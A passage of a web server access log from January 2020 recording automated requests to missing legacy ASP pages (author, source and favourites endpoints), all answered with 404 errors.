/ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%8E%C3%82%C3%96%C3%9D%C3%8A%C3%90%C2%BD%C3%8C%C3%91%C3%90%C3%8A%C3%92 HTTP/1.0" 404 6456 Not Found: /ShowAuthor.asp [06/Jan/2020 17:04:08] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%8E%C3%82%C3%96%C3%9D%C3%8A%C3%90%C2%BD%C3%8C%C3%93%C3%BD%C2%BE%C3%96 HTTP/1.0" 404 6456 Not Found: /ShowAuthor.asp [06/Jan/2020 17:04:26] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%95%C3%A2%C3%90%C2%A9%C2%BE%C3%9E%C3%88%C3%8B%C2%BE%C2%BF%C2%BE%C2%B9%C3%80%C3%AB%C3%94%C3%9B%C3%83%C3%87%C3%93%C3%90%C2%B5%C3%A3%C2%BC%C3%A4%C2%B8%C3%B4%C3%81%C3%8B HTTP/1.0" 404 6552 Not Found: /ShowAuthor.asp [06/Jan/2020 17:04:29] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E4%BB%8E%E6%A0%B9%E6%9C%AC%E4%B8%8A%E9%9A%94%E7%BB%9D%E8%B4%AB%E7%A9%B7%E7%9A%84%E4%BB%A3%E9%99%85%E4%BC%A0%E9%80%92 HTTP/1.0" 404 6501 [06/Jan/2020 17:05:02] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [06/Jan/2020 17:05:57] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E4%BB%A5%E5%AE%9E%E5%8A%9B%E5%8C%B9%E9%85%8D%E4%BA%86%E5%AE%A3%E4%BC%A0%E7%9A%84%E6%83%85%E6%80%80 HTTP/1.0" 404 6483 Not Found: /ShowAuthor.asp [06/Jan/2020 17:06:41] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E5%85%91%E5%A5%96%E5%A4%84%E5%B7%A5%E4%BD%9C%E4%BA%BA%E5%91%98%E7%AC%AC%E4%B8%80%E6%97%B6%E9%97%B4%E5%91%8A%E7%9F%A5 HTTP/1.0" 404 6501 Not Found: /ShowAuthor.asp [06/Jan/2020 17:06:59] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E5%A5%A5%E8%BF%AA%E5%90%8C%E6%AF%94%E5%A2%9E%E5%8A%A05.9%25%E8%87%B36,195%E8%BE%86 HTTP/1.0" 404 6467 Not Found: /ShowAuthor.asp [06/Jan/2020 17:07:30] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E6%95%99%E5%8A%A1%E5%A4%84 HTTP/1.0" 404 6447 Not Found: /ShowAuthor.asp [06/Jan/2020 17:07:49] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E7%BA%A7%E4%B8%AD%E5%AD%A6%E6%95%99%E5%8A%A1%E5%A4%84 HTTP/1.0" 404 6465 Not Found: /ShowAuthor.asp [06/Jan/2020 17:07:57] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%B8%A9%E5%B7%9E%E5%B8%82%E6%95%99%E7%A0%94%E5%AE%A4 HTTP/1.0" 404 6438 Not Found: /ShowAuthor.asp [06/Jan/2020 17:08:12] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%B8%A9%E5%B7%9E%E5%B8%82%E6%95%99%E8%82%B2%E5%B1%80 HTTP/1.0" 404 6438 Not Found: /ShowAuthor.asp [06/Jan/2020 17:08:19] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E8%8B%8D%E5%8D%97%E6%95%99%E8%82%B2%E7%BD%91 HTTP/1.0" 404 6429 Not Found: /ShowAuthor.asp [06/Jan/2020 17:08:26] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E8%BF%99%E4%BA%9B%E5%B7%A8%E4%BA%BA%E7%A9%B6%E7%AB%9F%E7%A6%BB%E5%92%B1%E4%BB%AC%E6%9C%89%E7%82%B9%E9%97%B4%E9%9A%94%E4%BA%86 HTTP/1.0" 404 6510 Not Found: /ShowAuthor.asp [06/Jan/2020 17:08:29] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%C2%B0%C3%AC%C3%80%C3%AD%C3%8D%C3%A6%C2%BC%C3%92%C3%8D%C3%85%C2%B6%C3%93 HTTP/1.0" 404 6456 Not Found: /ShowAuthor.asp [06/Jan/2020 17:09:19] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C3%96%C3%90%C2%B5%C2%B3%C3%96%C2%A7%C2%B2%C2%BF HTTP/1.0" 404 6468 Not Found: /ShowAuthor.asp [06/Jan/2020 17:09:24] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%C3%8B%C3%BB%C3%8F%C2%B2%C2%B0%C2%AE%C3%95%C3%A2%C2%B8%C3%B6%C3%8D%C3%AA%C2%B1%C3%8F HTTP/1.0" 404 6468 Not Found: /ShowAuthor.asp [06/Jan/2020 17:09:56] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%E4%BB%96%E5%96%9C%E7%88%B1%E8%BF%99%E4%B8%AA%E5%AE%8C%E6%AF%95 HTTP/1.0" 404 6447 [06/Jan/2020 17:10:05] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [06/Jan/2020 17:10:20] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%E5%8A%9E%E7%90%86%E7%8E%A9%E5%AE%B6%E5%9B%A2%E9%98%9F HTTP/1.0" 404 6438 Not Found: /ShowAuthor.asp [06/Jan/2020 17:10:40] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E5%85%9A%E6%94%AF%E9%83%A8 HTTP/1.0" 404 6447 Not Found: /ShowAuthor.asp [06/Jan/2020 17:11:47] "GET /ShowAuthor.asp?ChannelID=1005&AuthorName=%C3%90%C2%A1%C2%BA%C2%A2%C3%97%C3%93%C2%BF%C3%89%C3%84%C3%9C%C3%8A%C3%9C%C2%BF%C3%A0 HTTP/1.0" 404 6468 Not Found: /ShowAuthor.asp [06/Jan/2020 17:11:50] "GET /ShowAuthor.asp?ChannelID=1005&AuthorName=%E5%B0%8F%E5%AD%A9%E5%AD%90%E5%8F%AF%E8%83%BD%E5%8F%97%E8%8B%A6 HTTP/1.0" 404 6447 Not Found: /ShowAuthor.asp [06/Jan/2020 17:11:56] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%C2%BD%C3%8C%C3%8E%C3%B1%C2%BF%C3%86%C3%91%C3%90%C2%B4%C2%A6 HTTP/1.0" 404 6444 Not Found: /ShowAuthor.asp [06/Jan/2020 17:12:07] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C3%96%C3%90%C2%BD%C3%8C%C3%8E%C3%B1%C2%B4%C2%A6 HTTP/1.0" 404 6468 Not Found: /ShowAuthor.asp [06/Jan/2020 17:12:22] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%C3%8E%C2%BB%C2%BE%C3%93%C2%B9%C3%BA%C3%84%C3%9A%C2%B3%C3%8B%C3%93%C3%83%C2%B3%C2%B5%C3%89%C3%8C%C2%B3%C2%A1%C2%B0%C3%B1%C3%8A%C3%97 HTTP/1.0" 404 6516 Not Found: /ShowAuthor.asp [06/Jan/2020 17:13:20] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E4%BD%8D%E5%B1%85%E5%9B%BD%E5%86%85%E4%B9%98%E7%94%A8%E8%BD%A6%E5%95%86%E5%9C%BA%E6%A6%9C%E9%A6%96 HTTP/1.0" 404 6483 Not Found: /ShowAuthor.asp [06/Jan/2020 17:13:35] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E5%93%81%E7%89%8C%E5%8F%97%E5%B0%BE%E6%B0%94%E9%97%A8%E5%BD%B1%E5%93%8D%E8%B7%8C%E8%90%BD25%25 HTTP/1.0" 404 6479 Not Found: /ShowAuthor.asp [06/Jan/2020 17:14:25] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%95%99%E5%8A%A1%E7%A7%91%E7%A0%94%E5%A4%84 HTTP/1.0" 404 6429 Not Found: /ShowAuthor.asp [06/Jan/2020 17:14:43] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E6%95%99%E5%8A%A1%E5%A4%84 HTTP/1.0" 404 6447 [06/Jan/2020 17:15:07] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [06/Jan/2020 17:15:19] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E6%95%99%E5%8A%A1%E7%A7%91%E7%A0%94%E5%A4%84 HTTP/1.0" 404 6465 Not Found: /ShowAuthor.asp [06/Jan/2020 17:16:09] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%B8%A9%E5%B7%9E%E5%B8%82%E6%95%99%E8%82%B2%E5%B1%80 HTTP/1.0" 404 6438 Not Found: /ShowAuthor.asp [06/Jan/2020 17:16:16] "GET /ShowAuthor.asp?ChannelID=1007&AuthorName=%C2%B6%C3%B8%C3%95%C3%A2%C3%94%C3%94%C3%85%C3%A0%C3%8E%C3%AF%C2%BC%C2%A4%C3%8B%C3%98%C3%93%C3%96%C2%B1%C2%BB%C2%B3%C3%86%C3%8E%C2%AA%C2%B3%C3%A0%C3%83%C2%B9%C3%8B%C3%98 HTTP/1.0" 404 6552 Not Found: /ShowAuthor.asp [06/Jan/2020 17:16:22] "GET /ShowAuthor.asp?ChannelID=1007&AuthorName=%E8%80%8C%E8%BF%99%E6%A0%BD%E5%9F%B9%E7%89%A9%E6%BF%80%E7%B4%A0%E5%8F%88%E8%A2%AB%E7%A7%B0%E4%B8%BA%E8%B5%A4%E9%9C%89%E7%B4%A0 HTTP/1.0" 404 6510 Not Found: /ShowAuthor.asp [06/Jan/2020 17:16:45] "GET /ShowAuthor.asp?ChannelID=1009&AuthorName=%E7%9C%8B%E5%88%B0%E7%81%8C%E6%9C%A8%E4%B8%9B%E9%87%8C%E7%A5%9E%E5%87%BA%E9%AC%BC%E6%B2%A1%E7%9A%84%E8%BA%AB%E5%BD%B1%E4%BA%86%E5%90%97 HTTP/1.0" 404 6519 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:17:14] "GET /ShowCopyFrom.asp?id=722393872713 HTTP/1.0" 404 6375 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:17:17] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C2%B0%C3%BC%C2%BA%C2%AC%C2%B8%C3%B8%C2%B1%C2%BE%C2%BF%C3%86%C3%89%C3%BA%C2%A1%C2%A2%C3%91%C3%90%C3%8C%C3%96%C3%89%C3%BA%C3%89%C3%8F%C2%BF%C3%8E HTTP/1.0" 404 6534 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:18:13] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C2%BA%C3%9C%C3%93%C3%90%C2%B9%C2%A6%C3%82%C3%8A%C2%B5%C3%84%C2%B0%C3%91%C3%97%C3%B7%C3%92%C2%B5%C2%B8%C3%B8%C3%8D%C3%AA%C2%BD%C3%A1 HTTP/1.0" 404 6522 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:18:57] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C2%BD%C3%B1%C2%BA%C3%B3%C3%93%C2%B0%C3%8F%C3%AC%C3%81%C3%8B%C3%89%C3%A7%C2%BD%C2%BB%C2%B2%C3%85%C2%B8%C3%89%C3%88%C3%A7%C2%BA%C3%8E%C2%B0%C3%AC HTTP/1.0" 404 6534 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:19:26] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C3%83%C3%B1%C2%BE%C2%AF%C2%BE%C3%8D%C3%80%C2%B4%C2%B5%C2%BD%C3%81%C3%8B%C3%8B%C3%BB%C2%BC%C3%92 HTTP/1.0" 404 6486 [06/Jan/2020 17:20:10] "GET / HTTP/1.0" 302 0 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:20:19] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E4%BB%8A%E5%90%8E%E5%BD%B1%E5%93%8D%E4%BA%86%E7%A4%BE%E4%BA%A4%E6%89%8D%E5%B9%B2%E5%A6%82%E4%BD%95%E5%8A%9E HTTP/1.0" 404 6498 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:20:27] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E5%8C%85%E5%90%AB%E7%BB%99%E6%9C%AC%E7%A7%91%E7%94%9F%E3%80%81%E7%A0%94%E8%AE%A8%E7%94%9F%E4%B8%8A%E8%AF%BE HTTP/1.0" 404 6498 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:21:30] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E5%BE%88%E6%9C%89%E5%8A%9F%E7%8E%87%E7%9A%84%E6%8A%8A%E4%BD%9C%E4%B8%9A%E7%BB%99%E5%AE%8C%E7%BB%93 HTTP/1.0" 404 6489 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:22:13] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E6%8A%95%E6%A1%A3%E6%AF%94%E4%BB%85%E4%B8%BA18%25 HTTP/1.0" 404 6440 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:22:44] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E6%97%A0%E7%96%91%E8%BF%99%E5%B0%B1%E8%AF%9E%E7%94%9F%E4%BA%86%E6%97%A0%E7%A9%B7%E7%9A%84%E8%A8%80%E8%AF%AD%E8%AE%AD%E7%BB%83%E9%9C%80%E8%A6%81 HTTP/1.0" 404 6534 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:22:59] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E6%B0%91%E8%AD%A6%E5%B0%B1%E6%9D%A5%E5%88%B0%E4%BA%86%E4%BB%96%E5%AE%B6 HTTP/1.0" 404 6462 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:23:36] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=LiDong%C3%94%C3%9A%C3%89%C3%AE%C3%88%C2%AA%C3%91%C2%A7%C3%94%C2%BA%C2%BD%C3%A1%C3%92%C2%B5%C2%BA%C3%B3 HTTP/1.0" 404 6492 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:23:57] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=LiDong%E5%9C%A8%E6%B7%B1%E6%B3%89%E5%AD%A6%E9%99%A2%E7%BB%93%E4%B8%9A%E5%90%8E HTTP/1.0" 404 6468 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:24:38] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%C2%B8%C3%83%C2%BD%C3%8C%C3%93%C3%BD%C3%82%C2%A5%C2%B3%C2%B7%C2%B3%C3%BD%C2%B9%C2%A4%C2%B3%C3%8C%C2%BE%C2%AD%C2%B7%C3%91%C3%8E%C2%AA1300%C3%8D%C3%B2%C3%94%C2%AA HTTP/1.0" 404 6550 [06/Jan/2020 17:25:13] "GET / HTTP/1.0" 302 0 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:25:36] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%C2%BD%C2%BB%C2%B4%C3%B3%C2%B0%C3%A6%C2%B6%C2%A8%C3%96%C3%86%C3%94%C3%82%C2%B1%C3%BD%C2%B7%C3%96%C3%8E%C2%AA%C3%87%C3%A5%C3%95%C3%A6%C2%BA%C3%8D%C2%B7%C3%87%C3%87%C3%A5%C3%95%C3%A6%C3%81%C2%BD%C3%96%C3%96 HTTP/1.0" 404 6594 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:25:57] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%E4%BA%A4%E5%A4%A7%E7%89%88%E5%AE%9A%E5%88%B6%E6%9C%88%E9%A5%BC%E5%88%86%E4%B8%BA%E6%B8%85%E7%9C%9F%E5%92%8C%E9%9D%9E%E6%B8%85%E7%9C%9F%E4%B8%A4%E7%A7%8D HTTP/1.0" 404 6543 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:27:22] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%E8%AF%A5%E6%95%99%E8%82%B2%E6%A5%BC%E6%92%A4%E9%99%A4%E5%B7%A5%E7%A8%8B%E7%BB%8F%E8%B4%B9%E4%B8%BA1300%E4%B8%87%E5%85%83 HTTP/1.0" 404 6511 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:28:16] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C2%B5%C2%AB%C3%87%C3%B2%C2%B6%C3%93%C2%B1%C2%BE%C3%88%C3%BC%C2%BC%C2%BE%C2%B1%C2%BB%C3%8B%C3%95%C3%84%C3%BE%C3%8A%C3%95%C2%B9%C2%BA%C2%BA%C3%B3 HTTP/1.0" 404 6534 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:29:19] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C2%BF%C3%89%C3%8A%C3%87%C3%8D%C3%B8%C3%82%C3%A7%C3%93%C2%B0%C3%86%C2%AC%C2%B4%C2%A6%C3%93%C3%9A%C2%B8%C3%95%C3%86%C3%B0%C2%B2%C2%BD%C2%B5%C3%84%C3%86%C3%9A%C2%BC%C3%A4 HTTP/1.0" 404 6558 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:29:37] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C3%84%C2%BF%C3%87%C2%B0%C2%BB%C2%B9%C3%93%C3%90%C3%92%C2%BB%C3%8D%C3%B2%C3%86%C3%9F%C2%B5%C3%84%C2%B4%C3%BB%C2%BF%C3%AE HTTP/1.0" 404 6510 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:30:04] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C3%8F%C2%A3%C3%8D%C3%BB%C2%B4%C3%B3%C2%BC%C3%92%C2%B6%C2%BC%C3%84%C3%9C%C2%B9%C2%BB%C3%8C%C3%A1%C3%87%C2%B0%C3%97%C3%B6%C2%B5%C2%BD%C3%90%C3%84%C3%80%C3%AF%C3%93%C3%90%C3%8A%C3%BD HTTP/1.0" 404 6570 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:30:15] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E4%BD%86%E7%90%83%E9%98%9F%E6%9C%AC%E8%B5%9B%E5%AD%A3%E8%A2%AB%E8%8B%8F%E5%AE%81%E6%94%B6%E8%B4%AD%E5%90%8E HTTP/1.0" 404 6498 [06/Jan/2020 17:30:15] "GET / HTTP/1.0" 302 0 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:30:47] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E5%8F%AA%E9%9C%80%E5%AD%A6%E7%94%9F%E6%9D%A5%E5%92%A8%E8%AF%A2%E5%B0%B1%E8%B5%A0%E9%80%81 HTTP/1.0" 404 6480 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:31:21] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E5%8F%AF%E6%98%AF%E7%BD%91%E7%BB%9C%E5%BD%B1%E7%89%87%E5%A4%84%E4%BA%8E%E5%88%9A%E8%B5%B7%E6%AD%A5%E7%9A%84%E6%9C%9F%E9%97%B4 HTTP/1.0" 404 6516 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:31:25] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E5%B8%8C%E6%9C%9B%E5%A4%A7%E5%AE%B6%E9%83%BD%E8%83%BD%E5%A4%9F%E6%8F%90%E5%89%8D%E5%81%9A%E5%88%B0%E5%BF%83%E9%87%8C%E6%9C%89%E6%95%B0 HTTP/1.0" 404 6525 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:31:40] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E7%9B%AE%E5%89%8D%E8%BF%98%E6%9C%89%E4%B8%80%E4%B8%87%E4%B8%83%E7%9A%84%E8%B4%B7%E6%AC%BE HTTP/1.0" 404 6480 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:32:20] "GET /ShowCopyFrom.asp?%C3%94%C3%9B%C3%83%C3%87%C3%92%C2%AA%C3%96%C2%AA%C2%B5%C3%80%C2%B0%C2%AE%C3%87%C3%A9%C3%80%C3%AF%C3%83%C2%BB%C3%93%C3%90%C3%85%C3%A4%C2%B2%C2%BB%C3%85%C3%A4 HTTP/1.0" 404 6516 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:33:05] "GET /ShowCopyFrom.asp?%E5%92%B1%E4%BB%AC%E8%A6%81%E7%9F%A5%E9%81%93%E7%88%B1%E6%83%85%E9%87%8C%E6%B2%A1%E6%9C%89%E9%85%8D%E4%B8%8D%E9%85%8D HTTP/1.0" 404 6477 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:33:40] "GET /ShowCopyFrom.asp?ChannelID=1007&SourceName=%C2%B5%C2%AB12%C3%84%C3%AA%C3%87%C2%B0%C2%B5%C3%84%C2%BB%C2%B7%C2%BE%C2%B3%C3%8F%C3%96%C3%92%C3%91%C3%8E%C3%9E%C2%B7%C2%A8%C2%B8%C3%84%C2%B6%C2%AF HTTP/1.0" 404 6536 Not Found: /ShowCopyFrom.asp [06/Jan/2020 17:34:29] "GET /ShowCopyFrom.asp?ChannelID=1007&SourceName=%E4%BD%8612%E5%B9%B4%E5%89%8D%E7%9A%84%E7%8E%AF%E5%A2%83%E7%8E%B0%E5%B7%B2%E6%97%A0%E6%B3%95%E6%94%B9%E5%8A%A8 HTTP/1.0" 404 6500 [06/Jan/2020 17:35:18] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:35:25] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=217 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:35:40] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=218 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:36:10] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=219 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:36:38] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=220 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:37:34] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=221 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:37:48] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=222 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:38:28] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=223 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:38:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=224 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:39:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=225 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:40:14] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=226 HTTP/1.0" 404 6422 [06/Jan/2020 17:40:21] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:40:47] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=227 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:40:59] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=228 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:41:03] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=229 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:41:20] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=230 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:41:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=231 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:42:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=233 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:43:08] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=234 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:43:17] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=235 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:43:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=236 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:44:00] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=237 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:44:13] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=239 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:44:19] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=246 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:44:30] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=247 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:44:41] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=251 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:44:43] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=253 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:44:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=254 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:45:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=256 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:45:16] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=259 HTTP/1.0" 404 6422 [06/Jan/2020 17:45:24] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:45:33] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=260 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:45:45] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=261 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:46:12] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=264 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:46:36] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=266 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:46:55] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=269 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:48:28] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=273 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:48:39] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=276 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:48:51] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=277 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:49:35] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=297 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:49:46] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=302 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:50:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=303 HTTP/1.0" 404 6422 [06/Jan/2020 17:50:27] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:50:50] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=305 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:50:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=306 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:51:14] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=307 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [06/Jan/2020 17:51:51] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=308 HTTP/1.0" 404 